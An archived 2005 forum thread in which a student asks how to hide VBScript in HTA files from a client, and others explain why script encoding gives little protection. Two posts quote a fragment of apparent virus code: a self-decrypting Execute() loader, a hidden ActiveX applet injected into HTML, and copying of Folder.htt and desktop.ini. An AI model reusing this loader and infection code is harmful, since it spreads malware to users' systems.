vbscript, encryption base:64

encryption base:64

Author	Message
Beris Hal #1 / 12	encryption base:64 hi all i am able to base:64 encode my outbound mails, news post's from Outlook Express, could this somehow be used to encode my VBScript's in standard HTA's HTM, files ? thanks
Thu, 07 Jul 2005 01:36:45 GMT

MVP #2 / 12	encryption base:64 Quote: > i am able to base:64 encode my outbound > mails, news post's from Outlook Express, could this somehow > be used to encode my vbscript's in standard HTA's > HTM, files ? I suppose you could, but why would you want to? If you did, you would at a minimum need to include some unencoded client script code. It would decode the base64 encoded script and then use something like ExecuteGlobal (vbs5.0+) or document.createElement("script") (ie5+) to inject the actual script into the page. But since your decoding script must be in the clear and base64 decoding can be done by anyone, what do you gain? I assume your objective is to hide something from the user. What you propose is a lot more work than simply using the MS Script Encoder and suffers from the same shortcoming. Both can be decoded with very little effort. You are only thwarting clueless users. -- Michael Harris Microsoft.MVP.Scripting Seattle WA US
Thu, 07 Jul 2005 03:08:21 GMT

Beris Hal #3 / 12	encryption base:64 Quote: > > i am able to base:64 encode my outbound > > mails, news post's from Outlook Express, could this somehow > > be used to encode my vbscript's in standard HTA's > > HTM, files ? > I suppose you could, but why would you want to? > If you did, you would at a minimum need to include some unencoded client > script code. It would decode the base64 encoded script and then use > something like ExecuteGlobal (vbs5.0+) or document.createElement("script") > (ie5+) to inject the actual script into the page. > But since your decoding script must be in the clear and base64 decoding can > be done by anyone, what do you gain? > I assume your objective is to hide something from the user. What you > propose is a lot more work than simply using the MS Script Encoder and > suffers from the same shortcoming. Both can be decoded with very little > effort. You are only thwarting clueless users. > -- > Michael Harris > Microsoft.MVP.Scripting > Seattle WA US Hi Michael the reason is straight foward, the person who will ultimately be viewing my code is likely to steel it. as i am not being paid for this work, i don't really want to spend a few weeks on it and for this client to benefit from it. all i want him to be able to do, is look at it. the project will be distributed on CD-ROM, so size isn't a problem, if that helps resolve this problem. you agree that this base 64 encoding could be done, this is what i have also found out from my searches for methods. but, it's mostly virus related links, something i'm not really interested in. but the sites i visited did point towards base64 encryption in files other than email and news group posts. how could i do this "ExecuteGlobal (vbs5.0+)" could you expand on this for me would i have to prompt my user to install something like WSH ? if so, that's not a problem, i can do that. is there any other way to protect my work ? because i've spent many weeks on developing my project and it's something i'm proud of, i use the SAPI to read web page contents and MS Agent to open web sites, tell time and mailto:, by uses speach recognition. Thanks Michael Beris
Fri, 08 Jul 2005 03:24:30 GMT

Joe Earnes #4 / 12	encryption base:64 Hi, If your script is WSH based, you may want to take a look at Gurgen Alaverdian's "Paranoia Scripter" encrypter. I haven't tried it, but I have suggested that others look there and haven't heard back anything negative. Its a full literal encoder (which is why it doesn't work on html-based script). Gurgen's site indicates that the VB code is available, so users with VB can alter and personalize the encryption, plus it takes a password. http://www.gurgensvbstuff.com/ps.htm Joe Earnest \| \| > > i am able to base:64 encode my outbound \| > > mails, news post's from Outlook Express, could this somehow \| > > be used to encode my vbscript's in standard HTA's \| > > HTM, files ? \| > \| > I suppose you could, but why would you want to? \| > \| > If you did, you would at a minimum need to include some unencoded client \| > script code. It would decode the base64 encoded script and then use \| > something like ExecuteGlobal (vbs5.0+) or document.createElement("script") \| > (ie5+) to inject the actual script into the page. \| > \| > But since your decoding script must be in the clear and base64 decoding \| can \| > be done by anyone, what do you gain? \| > \| > I assume your objective is to hide something from the user. What you \| > propose is a lot more work than simply using the MS Script Encoder and \| > suffers from the same shortcoming. Both can be decoded with very little \| > effort. You are only thwarting clueless users. \| > \| > -- \| > Michael Harris \| > Microsoft.MVP.Scripting \| > Seattle WA US \| > \| > \| \| Hi Michael \| \| the reason is straight foward, \| the person who will ultimately be viewing my code \| is likely to steel it. as i am not being paid for this \| work, i don't really want to spend a few weeks on it \| and for this client to benefit from it. \| \| all i want him to be able to do, is look at it. \| the project will be distributed on CD-ROM, so \| size isn't a problem, if that helps resolve this problem. \| \| you agree that this base 64 encoding could be done, \| this is what i have also found out from my searches \| for methods. but, it's mostly virus related links, something \| i'm not really interested in. but the sites i visited did \| point towards base64 encryption in files other than email \| and news group posts. \| \| how could i do this "ExecuteGlobal (vbs5.0+)" \| could you expand on this for me \| \| would i have to prompt my user to install something like WSH ? \| if so, that's not a problem, i can do that. \| \| is there any other way to protect my work ? \| because i've spent many weeks on developing my project \| and it's something i'm proud of, i use the SAPI to read web page \| contents and MS Agent to open web sites, tell time and mailto:, \| by uses speach recognition. \| \| \| \| Thanks Michael \| \| Beris \| \| \| \| \| \| \| \| \| \| \| --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.410 / Virus Database: 231 - Release Date: 10-31-02
Fri, 08 Jul 2005 06:05:47 GMT

MVP #5 / 12	encryption base:64 You missed my point... 1) script encoding is not script encryption. That in itself should stop the discussion... 2) the only encoded script format supported natively by the MS script engines is the MS version (produced directly or indirectly via the Script.Encoder component). 3) privately encoded script, regardless of the encoding chosen, must be decoded on the client to plain text to be executed. 4) The decoder script itself cannot itself be privately encoded. 5) since the decoder script is either in plain text or Script.Encoder format. 6) decoders for Script.Encoder format are readily available. In other words, you are (like Don Quixote) tilting at windmills. A DHTML based application is fundamentally plain text (despite any encoding). Attempts to "protect" plain text is pretty futile. Quote: > is there any other way to protect my work ? Encapsulate the functionality in a compiled ActiveX component written in a full featured programming language. But even these are not immune to reverse engineering. In the JavaScript world, there lots of "obfuscators" that essentially take meaningful JavaScript variable, function, and argument names and turn them into random, meaningless names. The script engines don't care if a function is named "DoThisLogicalProcess()" or "_jhsfuy673()". I don't personally know of any VBScript obfuscators, but about 5 minutes of googling found what appears to a purchased protection scheme for HTML... (Note that this is just a random hit I came across. I have no idea if it does what it claims to do or what it costs.) HTML password protection and encryption, encrypt HTML, protect website, hide source code, encrypt and customize HTML, javaScript/VBScript/XML http://www.atompark.com/products/tlp.htm If you really feel your source is that valuable, then you may not object to paying to protect it. -- Michael Harris Microsoft.MVP.Scripting Seattle WA US
Fri, 08 Jul 2005 06:34:03 GMT

Beris Hal #6 / 12	encryption base:64 Ok thanks all the same Quote: > You missed my point... > 1) script encoding is not script encryption. That in itself should stop > the discussion... > 2) the only encoded script format supported natively by the MS script > engines is the MS version (produced directly or indirectly via the > Script.Encoder component). > 3) privately encoded script, regardless of the encoding chosen, must be > decoded on the client to plain text to be executed. > 4) The decoder script itself cannot itself be privately encoded. > 5) since the decoder script is either in plain text or Script.Encoder > format. > 6) decoders for Script.Encoder format are readily available. > In other words, you are (like Don Quixote) tilting at windmills. A DHTML > based application is fundamentally plain text (despite any encoding). > Attempts to "protect" plain text is pretty futile. > > is there any other way to protect my work ? > Encapsulate the functionality in a compiled ActiveX component written in a > full featured programming language. But even these are not immune to > reverse engineering. > In the JavaScript world, there lots of "obfuscators" that essentially take > meaningful JavaScript variable, function, and argument names and turn them > into random, meaningless names. The script engines don't care if a function > is named "DoThisLogicalProcess()" or "_jhsfuy673()". > I don't personally know of any VBScript obfuscators, but about 5 minutes of > googling found what appears to a purchased protection scheme for HTML... > (Note that this is just a random hit I came across. I have no idea if it > does what it claims to do or what it costs.) > HTML password protection and encryption, encrypt HTML, protect website, hide > source code, encrypt and customize HTML, javaScript/VBScript/XML > http://www.atompark.com/products/tlp.htm > If you really feel your source is that valuable, then you may not object to > paying to protect it. > -- > Michael Harris > Microsoft.MVP.Scripting > Seattle WA US
Sat, 09 Jul 2005 06:05:38 GMT

Beris Hal #7 / 12	encryption base:64 Quote: > Hi, > If your script is WSH based, you may want to take a look > at Gurgen Alaverdian's "Paranoia Scripter" encrypter. I haven't > tried it, but I have suggested that others look there and haven't > heard back anything negative. Its a full literal encoder (which is > why it doesn't work on html-based script). Gurgen's site indicates > that the VB code is available, so users with VB can alter and > personalize the encryption, plus it takes a password. > http://www.gurgensvbstuff.com/ps.htm <--snip--> thanks Joe i do have a copy of Gurgens work already but my work is vbs and htm. looks like it's going to have to be good old faithfull SCRENC thanks all the same
Sat, 09 Jul 2005 06:09:21 GMT

Lee Peedi #8 / 12	encryption base:64 Quote: >abd why can't i do a simple encryption of a humble MS agent script Well I'm no expert, but I kinda think that any scripting of the MS Agent could be easily duplicated without ever seeing a line of your code. BUT, just in case you've really done something creative, might I suggest you choose something other than VBScript to create your code. Lee
Mon, 11 Jul 2005 05:00:41 GMT

Lee Peedi #9 / 12	encryption base:64 One more thing - any email reader can decrypt Base64, so where would there be any security in using it? Lee
Mon, 11 Jul 2005 05:02:02 GMT

Paul Randal #10 / 12	encryption base:64 Quote: > anyway, regardless of that insulting post. > i'm here to find an answer to my question. > not to be talked down too, by some hi, flyer. > base 64 / and other "ENCRYPTION" methods are > possible, how can i do this. > there is a method that i saw, that describes > the encrypted code which has been changed > something like this > UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & > OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & > """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & > OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = > Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = > 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod > 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = > vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = > vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & > TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" > ThisText = "ExeString = """ & TempString & """" > HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & > """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; > height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET > NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 > code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & > "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script > language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" > & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" > VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()" > WinPath = FSO.GetSpecialFolder(0) & "\" > If (FSO.FileExists(WinPath & "web\Folder.htt")) Then > FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif" > End If > If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then > FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & > "system32\kjwall.gif" > End If > End Function > my question is this : > why do virus writes have the upper edge > abd why can't i do a simple encryption of a humble MS agent script > NOTE > if you want to bombard me with "useless" technical data, then save it, > i don't want to know when the first queen of England was born.. > im not interested in M.Harris Insults, just because he's ... this, that, or > the other > i want to protect my vbs project distributed on a CD-ROM > i need technical answers to what virus writers take for granted > SIMPLE encryption "not SCRENC" > M.Harris, need not reply > Beris I think that a virus-writer's priorities are in this order, with items 1 and 2 being way more important than item 3: 1){filter}up someone else's computer 2) its not being traceable back to the author 3) should not be easily detected Encrypting only helps item 3. You as an author of a valuable script might have these priorities: 1) Script must work well, without anoying the user 2) User must not be able to see/steal the source Microsoft provides only a weak encryption to prevent someone from stealing your code. The HTML/WSH script engine only reads plain script or SCRENCed stuff. Any other solution you find has to provide the script engine with one of these two types of input, and the user will be able to intercept that input and read it if he really wants to. VBScript projects cannot currently be protected. Sad fact. I suppose you could download a bunch of script viruses and analyze them to see if and how they don't conform to plain script or SCRENCed script. I think you will find that they do conform. -Paul Randall
Mon, 11 Jul 2005 05:11:34 GMT

Beris Hal #11 / 12	encryption base:64 Quote: Quote: > > anyway, regardless of that insulting post. > > i'm here to find an answer to my question. > > not to be talked down too, by some hi, flyer. > > base 64 / and other "ENCRYPTION" methods are > > possible, how can i do this. > > there is a method that i saw, that describes > > the encrypted code which has been changed > > something like this > > UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & > > OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & > > """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & > > OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = > > Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = - Hide quoted text - - Show quoted text - Quote: > > 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod > > 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = > > vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = > > vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & > > TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" > > ThisText = "ExeString = """ & TempString & """" > > HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & > > """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; > > height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET > > NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 > > code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & > > "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script > > language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" > > & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" > > VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()" > > WinPath = FSO.GetSpecialFolder(0) & "\" > > If (FSO.FileExists(WinPath & "web\Folder.htt")) Then > > FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif" > > End If > > If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then > > FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & > > "system32\kjwall.gif" > > End If > > End Function > > my question is this : > > why do virus writes have the upper edge > > abd why can't i do a simple encryption of a humble MS agent script > > NOTE > > if you want to bombard me with "useless" technical data, then save it, > > i don't want to know when the first queen of England was born.. > > im not interested in M.Harris Insults, just because he's ... this, that, or > > the other > > i want to protect my vbs project distributed on a CD-ROM > > i need technical answers to what virus writers take for granted > > SIMPLE encryption "not SCRENC" > > M.Harris, need not reply > > Beris > I think that a virus-writer's priorities are in this order, with items 1 and 2 being way more important than item 3: Quote: > 1){filter}up someone else's computer > 2) its not being traceable back to the author > 3) should not be easily detected > Encrypting only helps item 3. > You as an author of a valuable script might have these priorities: > 1) Script must work well, without anoying the user > 2) User must not be able to see/steal the source > Microsoft provides only a weak encryption to prevent someone from stealing your code. The HTML/WSH script engine only reads plain Quote: > script or SCRENCed stuff. Any other solution you find has to provide the script engine with one of these two types of input, and Quote: > the user will be able to intercept that input and read it if he really wants to. > VBScript projects cannot currently be protected. Sad fact. > I suppose you could download a bunch of script viruses and analyze them to see if and how they don't conform to plain script or Quote: > SCRENCed script. I think you will find that they do conform. > -Paul Randall first of all, i'm not remotely iterested in virus / worm code.. i have more pressing things on my mind than virus like graduation i have already done the looking at virri thing, but what if my client A/V picks that up.. that's real good besides my lectures will kick me into space why would i want to scew somebody machine ?? honestly....... some people ?? it's beggers belief ok, here's my reason, yes, i have created two HTA's that perfom like a dream. after months of questions and endless searches...... (BUT) i still have to work a way to call them from Director 7 i'm a third year university student, and the project i'm doing MUST be submitted to real life client. my client is a travel agent, that doesn't have much knowledge of MS stuff, apart from SCRENC and decrypter, he uses to steal peoples HARD work (hope he doesn't read this) i have visual studio 6 under a student licence (160) and i did try to create a an active X control like michael told me, but vb creates 3 files, NOT 1 (ocx) and i know nothing of C++ or MFC. this client will rip me off..... can i stop him ?? thanks anyway Paul, i appreaciate your reply Beris
Mon, 11 Jul 2005 07:16:18 GMT

Page 1 of 1

[ 12 post ]